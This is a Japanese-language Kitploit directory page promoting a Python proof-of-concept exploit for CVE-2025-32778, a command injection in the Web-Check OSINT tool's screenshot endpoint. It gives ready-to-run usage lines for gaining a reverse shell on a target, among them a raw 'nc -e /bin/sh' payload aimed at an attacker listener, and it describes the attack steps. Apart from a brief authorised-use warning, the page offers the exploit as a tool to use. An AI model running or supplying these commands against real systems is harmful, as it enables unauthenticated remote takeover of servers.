Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32778 — CVE-2025-32778のPoCエクスプロイト: Web-Check OSINTツールにおけるコマンドインジェクション | Kitploit
ツール/GitHubGitHub/00xcanelo/cve-2025-32778
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

CVE-2025-32778のPoCエクスプロイト: Web-Check OSINTツールにおけるコマンドインジェクション

リポジトリを見る
31491年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32778 - Web-Check コマンドインジェクションエクスプロイト

Critical Language: Python

説明

CVE-2025-32778 は、Lissy93 による Web-Check OSINT ツールにおける重大なコマンドインジェクションの脆弱性です。
認証されていない攻撃者が、スクリーンショット API の url パラメータを介して任意のシステムコマンドを実行することを可能にします。

この Python スクリプトは、エクスプロイトを自動化し、リバースシェルを生成したり、カスタムシェルペイロードを受け入れたりできます。


警告

  • 所有している、またはテストを許可されたシステムでのみテストしてください。
  • 無断使用は違法であり、非倫理的です。

機能

  • Web-Check の url コマンドインジェクションを悪用します。
  • サポート:
    • --lhost と --lport を使用したリバースシェル。
    • --shell を使用したカスタムシェル。
  • URL の正規化。
  • --shell と --lhost/--lport の組み合わせを防止します。

必要条件

  • Python 3.x
  • Requests ライブラリ:
root@kitploit:~
pip install requests

使用方法

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778

ツールでリバースシェルを作成する

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444

カスタムシェルペイロード(Raw)

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"

ヘルプメニュー

root@kitploit:~
python3 cve-2025-32778.py -h

動作の仕組み

  1. ターゲット URL を scheme://host[:port] に正規化します。

  2. ペイロードを準備します:

    • --lhost と --lport を使用してリバースシェルを生成します。
    • または、--shell を使用して raw シェルコマンドを使用します。
  3. シェルペイロードを安全な URL インジェクションのためにエンコードします。

  4. ペイロードを含む HTTP GET リクエストを /api/screenshot/ に送信します。

  5. リバースシェル接続を待ちます。


🧑‍💻 作者

00xCanelo
GitHub プロフィール


参照

  • Web-Check GitHub リポジトリ – 脆弱なコードを含む元のプロジェクト。
  • CVE-2025-32778 – コマンドインジェクションの脆弱性を説明する CVE エントリ。
ツールをダウンロード